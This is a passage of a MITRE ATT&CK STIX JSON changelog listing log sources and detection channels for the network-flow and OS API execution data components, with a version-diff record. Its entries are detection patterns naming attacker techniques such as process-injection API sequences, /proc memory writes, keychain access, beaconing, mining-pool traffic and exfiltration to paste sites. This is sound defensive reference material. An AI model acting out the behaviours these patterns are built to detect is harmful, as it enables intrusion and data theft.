                            "name": "AWS:VPCFlowLogs",
                            "channel": "VPC/NSG flow logs for pod/instance egress to Internet or metadata"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Suspicious outbound traffic from browser binary to non-standard domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Abnormal browser traffic volume or destination"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound requests to domains not previously resolved or associated with phishing campaigns"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound traffic to domains/IPs not previously resolved, occurring shortly after attachment download or link click"
                        },
                        {
                            "name": "M365Defender:DeviceNetworkEvents",
                            "channel": "NetworkConnection: bytes_sent >> bytes_received anomaly"
                        },
                        {
                            "name": "PF:Logs",
                            "channel": "outbound flows with bytes_out >> bytes_in"
                        },
                        {
                            "name": "NSX:FlowLogs",
                            "channel": "network_flow: bytes_out >> bytes_in to external"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "NetFlow/Zeek conn.log"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Outbound data flows"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Flow records with entropy signatures resembling symmetric encryption"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "flow records"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "flow records"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "HTTPS POST to known webhook URLs"
                        },
                        {
                            "name": "saas:api",
                            "channel": "Webhook registrations or repeated POST activity"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Source/destination IP translation inconsistent with intended policy"
                        },
                        {
                            "name": "SNMP:DeviceLogs",
                            "channel": "Unexpected NAT translation statistics or rule insertion events"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Sudden spike in incoming flows to web service ports from single/multiple IPs"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Unusual volume of inbound packets from single source across short time interval"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "port 5900 inbound"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TCP port 5900 open"
                        },
                        {
                            "name": "NSM:firewall",
                            "channel": "inbound connection to port 5900"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "Outbound connections to 139/445 to multiple destinations"
                        },
                        {
                            "name": "VPCFlowLogs:All",
                            "channel": "High volume internal traffic with low entropy indicating looped or malicious DoS script"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "NetFlow/sFlow/PCAP"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound Network Flow"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "com.apple.network"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Device-to-Device Deployment Flows"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket/connect syscalls"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "outbound TCP/UDP traffic over unexpected port"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "ESXi service connections on unexpected ports"
                        },
                        {
                            "name": "iptables:LOG",
                            "channel": "OUTBOUND"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "tcp/udp"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "CLI network calls"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound traffic from suspicious new processes post-attachment execution"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Suspicious anomalies in transmitted data integrity during application network operations"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "DNS resolution events leading to outbound traffic on unexpected ports"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound traffic to mining pools or proxies"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Outbound flow logs to known mining pools"
                        },
                        {
                            "name": "container:cni",
                            "channel": "Outbound network traffic to mining proxies"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "TLS session established by ESXi service to unapproved endpoint"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Session records with TLS-like byte patterns"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "HTTPS POST requests to pastebin.com or similar"
                        },
                        {
                            "name": "NetFlow:Flow",
                            "channel": "new outbound connections from exploited process tree"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "new connections from exploited lineage"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unexpected route changes or duplicate gateway advertisements"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Windows Firewall With Advanced Security/Firewall",
                            "channel": "EventCode=2004, 2005, 2006"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Knock pattern: repeated REJ/S0 across \u2265MinSequenceLen ports from same src_ip then SF success."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Firewall/PF anchor load or rule change events."
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Config/ACL changes, line vty transport input changes, telnet/ssh/http(s) enable, image/feature module changes."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "First-time egress to non-approved update hosts right after install/update"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "New outbound flows to non-approved vendor hosts post install"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "New/rare egress to non-approved update hosts after install"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large outbound HTTPS uploads to repo domains"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "HTTPS traffic to repository domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "alert log"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "None"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound flow records"
                        },
                        {
                            "name": "m365:defender",
                            "channel": "NetworkConnection: high out:in ratio, periodic beacons, protocol mismatch"
                        },
                        {
                            "name": "PF:Logs",
                            "channel": "high out:in ratio or fixed-size periodic flows"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "network_flow: bytes_out >> bytes_in, fixed packet sizes/intervals to non-approved CIDRs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "connect or sendto system call with burst pattern"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "sudden burst in outgoing packets from same PID"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "source instance sends large volume of traffic in short window"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "session stats with bytes_out > bytes_in"
                        },
                        {
                            "name": "NIDS:Flow",
                            "channel": "session stats with bytes_out > bytes_in"
                        },
                        {
                            "name": "esxi:vpxa",
                            "channel": "connection attempts and data transmission logs"
                        },
                        {
                            "name": "PF:Logs",
                            "channel": "External traffic to remote access services"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "High volumes of SYN/ACK packets with unacknowledged TCP handshakes"
                        },
                        {
                            "name": "dns:query",
                            "channel": "Outbound resolution to hidden service domains (e.g., `.onion`)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log + ssl.log with Tor fingerprinting"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "forwarded encrypted traffic"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Relayed session pathing (multi-hop)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound TCP SYN or UDP to multiple ports/hosts"
                        },
                        {
                            "name": "containerd:runtime",
                            "channel": "container-level outbound traffic events"
                        },
                        {
                            "name": "WLANLogs:Association",
                            "channel": "Multiple APs advertising the same SSID but with different BSSID/MAC or encryption type"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "socket_events"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "ARP cache modification attempts observed through event tracing or security baselines"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Gratuitous ARP replies with mismatched IP-MAC binding"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "ARP table updates inconsistent with expected gateway or DHCP lease assignments"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "networkd or com.apple.network"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream 'eventMessage contains \"dns_request\"'"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "/var/log/syslog.log"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "CreateTrafficMirrorSession or ModifyTrafficMirrorTarget"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Config change: CLI/NETCONF/SNMP \u2013 'monitor session', 'mirror port'"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound UDP floods targeting common reflection services with spoofed IP headers"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Outbound UDP spikes to external reflector IPs"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Large outbound UDP traffic to multiple public reflector IPs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "High entropy domain queries with multiple NXDOMAINs"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "Frequent DNS queries with high entropy names or NXDOMAIN results"
                        },
                        {
                            "name": "vpxd.log",
                            "channel": "API communication"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Outbound Connection"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Connection Tracking"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "pf firewall logs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Flow Creation (NetFlow/sFlow)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log, icmp.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Abnormal SMB authentication attempts correlated with poisoned LLMNR/NBT-NS sessions"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Gratuitous or duplicate DHCP OFFER packets from non-legitimate servers"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Inbound on ports 5985/5986"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Multiple IP addresses assigned to the same domain in rapid sequence"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Rapid domain-to-IP resolution changes for same domain"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "Frequent DNS resolution of same domain with rotating IPs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "uncommon ports"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "alternate ports"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "None"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log or flow data"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "egress log analysis"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "egress logs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "High volume flows with incomplete TCP sessions or single-packet bursts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Knock pattern: multiple REJ/S0 to distinct closed ports then successful connection to service_port"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Firewall rule enable/disable or listen socket changes"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Config/ACL/line vty changes, service enable (telnet/ssh/http(s)), module reloads"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ioctl: Changes to wireless network interfaces (up, down, reassociate)"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "query: Historical list of associated SSIDs compared against baseline"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "First-time egress from host after new install to unknown update endpoints"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "First-time egress to unknown registries/mirrors immediately after install"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "New egress from app just installed to unknown update endpoints"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "ESXi processes relaying traffic via SSH or unexpected ports"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound connection to mining pool port (3333, 4444, 5555)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound traffic to mining pool upon container launch"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Flow records with RSA key exchange on unexpected port"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound connections from web server binaries (apache2, nginx, php-fpm) to unknown external IPs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "sustained outbound HTTPS sessions with high data volume"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Connections from IDE hosts to marketplace/tunnel domains"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Outbound connections from IDE processes to marketplace/tunnel domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large HTTPS outbound uploads"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "network flows to external cloud services"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TCP port 22 traffic"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "port 22 access"
                        },
                        {
                            "name": "TelecomLogs:MobilityEvents",
                            "channel": "Unexpected location resolution events or abnormal subscriber tracking requests"
                        },
                        {
                            "name": "TelecomLogs:MobilityEvents",
                            "channel": "Unexpected subscriber tracking or abnormal mobility/location resolution activity"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Application-layer protocol traffic exhibiting beacon-like periodicity, anomalous session structure, or protocol misuse patterns"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "App-attributed traffic exhibits multi-destination fan-out, sustained session bridging, or SOCKS-like relay behavior inconsistent with normal client-only mobile communication"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 17:32:30.362000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0078\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0078\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][155]\": {\"name\": \"TelecomLogs:MobilityEvents\", \"channel\": \"Unexpected location resolution events or abnormal subscriber tracking requests\"}, \"root['x_mitre_log_sources'][156]\": {\"name\": \"TelecomLogs:MobilityEvents\", \"channel\": \"Unexpected subscriber tracking or abnormal mobility/location resolution activity\"}, \"root['x_mitre_log_sources'][157]\": {\"name\": \"NSM:Flow\", \"channel\": \"Application-layer protocol traffic exhibiting beacon-like periodicity, anomalous session structure, or protocol misuse patterns\"}, \"root['x_mitre_log_sources'][158]\": {\"name\": \"NSM:Flow\", \"channel\": \"App-attributed traffic exhibits multi-destination fan-out, sustained session bridging, or SOCKS-like relay behavior inconsistent with normal client-only mobile communication\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.272000+00:00",
                    "modified": "2026-04-23 18:22:40.476000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0021",
                            "external_id": "DC0021"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "OS API Execution",
                    "description": "Calls made by a process to operating system-provided Application Programming Interfaces (APIs). These calls are essential for interacting with system resources such as memory, files, and hardware, or for performing system-level tasks. Monitoring these calls can provide insight into a process's intent, especially if the process is malicious.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Process",
                            "channel": "None"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Base",
                            "channel": "GetLocaleInfoW, GetTimeZoneInformation API calls"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "GetMetadata, DescribeInstanceIdentity"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "open, execve: Unexpected processes accessing or modifying critical files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ptrace, ioctl"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "API tracing / stack tracing via ETW or telemetry-based EDR"
                        },
                        {
                            "name": "EDR:memory",
                            "channel": "Behavioral API telemetry (GetProcAddress, LoadLibrary, VirtualAlloc)"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "aaa privilege_exec"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "None"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "APCQueueOperations"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Invocation of SMLoginItemSetEnabled by non-system or recently installed application"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "flock|NSDistributedLock|FileHandle.*lockForWriting"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Directory-Services-SAM",
                            "channel": "api_call: Calls to DsAddSidHistory or related RPC operations"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "application logs referencing NSTimer, sleep, or launchd delays"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "High-frequency or suspicious sequence of QueryPerformanceCounter/GetTickCount API calls from a non-standard process lineage"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Rules capturing clock_gettime, time, gettimeofday syscalls when enabled"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Unexpected reload, crashinfo, or boot message not tied to scheduled maintenance"
                        },
                        {
                            "name": "etw:Microsoft-Windows-RPC",
                            "channel": "rpc_call: srvsvc.NetShareEnum / NetShareEnumAll from non-admin or unusual processes"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "smb_command: TreeConnectAndX to \\\\*\\IPC$ / srvsvc or Trans2/NT_CREATE for listing shares"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4670, 4656"
                        },
                        {
                            "name": "EDR:memory",
                            "channel": "API usage MFCreateDeviceSource, IAMStreamConfig, ICaptureGraphBuilder2, DirectShow filter graph creation from uncommon callers"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "openat/read/ioctl: openat/read/ioctl on /dev/video* by uncommon user/process"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Access decisions to kTCCServiceCamera for unexpected binaries"
                        },
                        {
                            "name": "EDR:memory",
                            "channel": "Objective\u2011C/Swift calls to AVCaptureDevice/AVCaptureSession by non-whitelisted processes"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "mmap, ptrace, process_vm_writev or direct memory ops"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "API call to AddMonitor invoked by non-installer process"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Win32k",
                            "channel": "SetWindowLong, SetClassLong, NtUserMessageCall, SendNotifyMessage, PostMessage"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "unshare, mount, keyctl, setns syscalls executed by containerized processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "audio APIs"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-COM/Operational",
                            "channel": "CLSID activation events where ProcessName=mmc.exe and CLSID not in allowed baseline"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "com.apple.securityd, com.apple.tccd"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "send, recv, write: Abnormal interception or alteration of transmitted data"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "CALCULATE: Integrity validation of transmitted data via hash checks"
                        },
                        {
                            "name": "ETW:Token",
                            "channel": "token_analysis: API calls such as DuplicateTokenEx or ImpersonateLoggedOnUser"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "API Calls"
                        },
                        {
                            "name": "etw:Microsoft-Windows-DotNETRuntime",
                            "channel": "AssemblyLoad/ModuleLoad (Loader keyword) from Microsoft-Windows-DotNETRuntime"
                        },
                        {
                            "name": "EDR:memory",
                            "channel": "VirtualAlloc/VirtualProtect/MapViewOfFile indicators via stack/heap activity and ImageLoad"
                        },
                        {
                            "name": "auditd:MMAP",
                            "channel": "memory region with RWX permissions allocated"
                        },
                        {
                            "name": "snmp:trap",
                            "channel": "management queries"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "Describe* or List* API calls"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Win32k",
                            "channel": "SendMessage, PostMessage, LVM_*"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "sudo or pkexec invocation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "authorization execute privilege requests"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "NtQueryInformationProcess"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "ptrace: Processes invoking ptrace with PTRACE_TRACEME flag"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Remote access API calls and file uploads"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Execution of modified binaries or abnormal library load sequences"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Calls to AuthorizationExecuteWithPrivileges() observed via Apple System Logger or security_auditing tools"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "access or unlock attempt to keychain database"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of input detection APIs (e.g., CGEventSourceKeyState)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "mount system call with bind or remap flags"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "Decrypt"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-File",
                            "channel": "ZwSetEaFile or ZwQueryEaFile function calls"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "fork/clone/daemon syscall tracing"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "Detached process execution with no associated parent"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ptrace, mmap, mprotect, open, dlopen"
                        },
                        {
                            "name": "ETW:ProcThread",
                            "channel": "api_call: CreateProcessWithTokenW, CreateProcessAsUserW"
                        },
                        {
                            "name": "EDR:memory",
                            "channel": "MemoryWriteToExecutable"
                        },
                        {
                            "name": "ETW:Token",
                            "channel": "api_call: DuplicateTokenEx, ImpersonateLoggedOnUser, SetThreadToken"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "api_call: UpdateProcThreadAttribute (PROC_THREAD_ATTRIBUTE_PARENT_PROCESS) and CreateProcess* with EXTENDED_STARTUPINFO_PRESENT / StartupInfoEx"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Security-Auditing",
                            "channel": "api_call: LogonUser(A|W), LsaLogonUser, SetThreadToken, ImpersonateLoggedOnUser"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "API calls"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ptrace, mmap, process_vm_writev"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of dd or sed targeting /proc/*/mem"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "CreateTransaction, CreateFileTransacted, RollbackTransaction, NtCreateProcessEx, NtCreateThreadEx"
                        },
                        {
                            "name": "ETW",
                            "channel": "Calls to GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "WriteProcessMemory: WriteProcessMemory targeting regions containing KernelCallbackTable addresses"
                        },
                        {
                            "name": "EDR:file",
                            "channel": "SetFileTime"
                        },
                        {
                            "name": "AndroidLogs:Kernel",
                            "channel": "Unprivileged app process (app UID, non-system) invoking sensitive syscalls or device interfaces associated with privilege escalation (setuid, ptrace, perf_event_open, vulnerable drivers)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "SELinux AVC for execmem/execute_no_trans/mprotect following recent writes by same UID"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "mmap/mprotect transitions to PROT_EXEC for pages associated with recently written files"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "QUERY on exported ContentProviders of other packages (content://<other.pkg>/*) or MediaStore scoped queries immediately preceding file reads"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "ClipboardManager (addOnPrimaryClipChangedListener|getPrimaryClip|getPrimaryClipDescription) invoked by <pkg>"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "AccessibilityService connected|TYPE_VIEW_TEXT_CHANGED|TYPE_VIEW_FOCUSED events for other packages"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "TYPE_WINDOW_STATE_CHANGED / TYPE_VIEW_FOCUSED shows foreign target package in foreground"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "PackageManager getInstalledApplications|getInstalledPackages|getPackagesHoldingPermissions burst for <pkg>. TYPE_WINDOW_STATE_CHANGED shows foreground app then immediate package queries by <pkg>"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "LSApplicationWorkspace or canOpenURL probe bursts for many URL schemes"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "getInstalledPackages/getPackagesHoldingPermissions with filters for known security/MDM/VPN package names. Queries to isDeviceOwnerApp/isProfileOwnerApp/getActiveAdmins/getPermissionGrantState. Requests list of enabled services or monitors TYPE_WINDOW_STATE_CHANGED to time checks"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Queries indicating MDM profile presence, supervised state, restrictions read. LSApplicationWorkspace enumeration or app proxy queries referencing security vendors"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "ACTION_VIEW redirect_uri handled by unexpected package"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "canOpenURL/LSApplicationWorkspace resolved to unexpected bundle for redirect_uri"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "query() against MediaStore/DocumentsContract URIs (Images/Video/Audio/Downloads/DocumentTree)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "enumeratorForContainerItemIdentifier / itemForIdentifier across multiple containers/providers"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "wifiservice startScan / scanResults retrieved repeatedly or by unexpected package"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "bluetoothmanager startDiscovery / getBondedDevices / scan callback bursts by package"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "telephony cell info enumeration bursts (neighboring/all cell info) by package"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "repeated queries or dumps related to running tasks/services/process state by same package/UID (e.g., getRunningAppProcesses, running services/task inspection)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Application accesses android.os.Build fields or device configuration APIs (MODEL, MANUFACTURER, VERSION.SDK_INT, HARDWARE)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Application invokes UIDevice queries (model, systemVersion, name)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Invocation of MediaRecorder.start(), AudioRecord.startRecording(), or VOICE_CALL audio source"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Invocation of AVAudioRecorder, AVCaptureSession, or related audio capture framework calls"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Application invokes LocationManager, FusedLocationProviderClient, or GPS/location sensor APIs"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Application activates CoreLocation services or CLLocationManager APIs"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Framework-based networking usage spikes or uncommon networking stacks observed by agent telemetry (e.g., repeated URLSession/OkHttp-like patterns) without corresponding foreground/user interaction"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Agent-observable telephony subscription/state API signals indicating SIM/eSIM subscription change (vendor-agnostic: 'telephony subscription changed')"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Accessibility framework usage patterns such as event subscription, performAction invocation, node traversal, text change observation, or overlay/window presentation correlated to app identity"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Browser/WebView framework usage indicating external URL load, script execution enablement, file download initiation, intent handoff, or package install prompt sequence"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Observed device-service, trust-service, backup/service interaction, or other privileged framework activity associated with physical host access"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Connectivity manager, telephony, Wi-Fi, network callback, or location-provider framework reports repeated unavailable, disconnected, suspended, or degraded state transitions"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Observed network-path, reachability, DNS, transport, or location-provider framework reports repeated unavailable or failed state near active device use"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Content resolver, document provider, media store, storage access framework, bulk stream processing, or repeated crypto-adjacent framework use observed during multi-file transformation"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Known application begins first-seen or expanded use of content providers, account services, accessibility, package services, cryptographic routines, dynamic loading, or other framework interactions after update/install"
                        },
                        {
                            "name": "MobileEDR:telemetry",
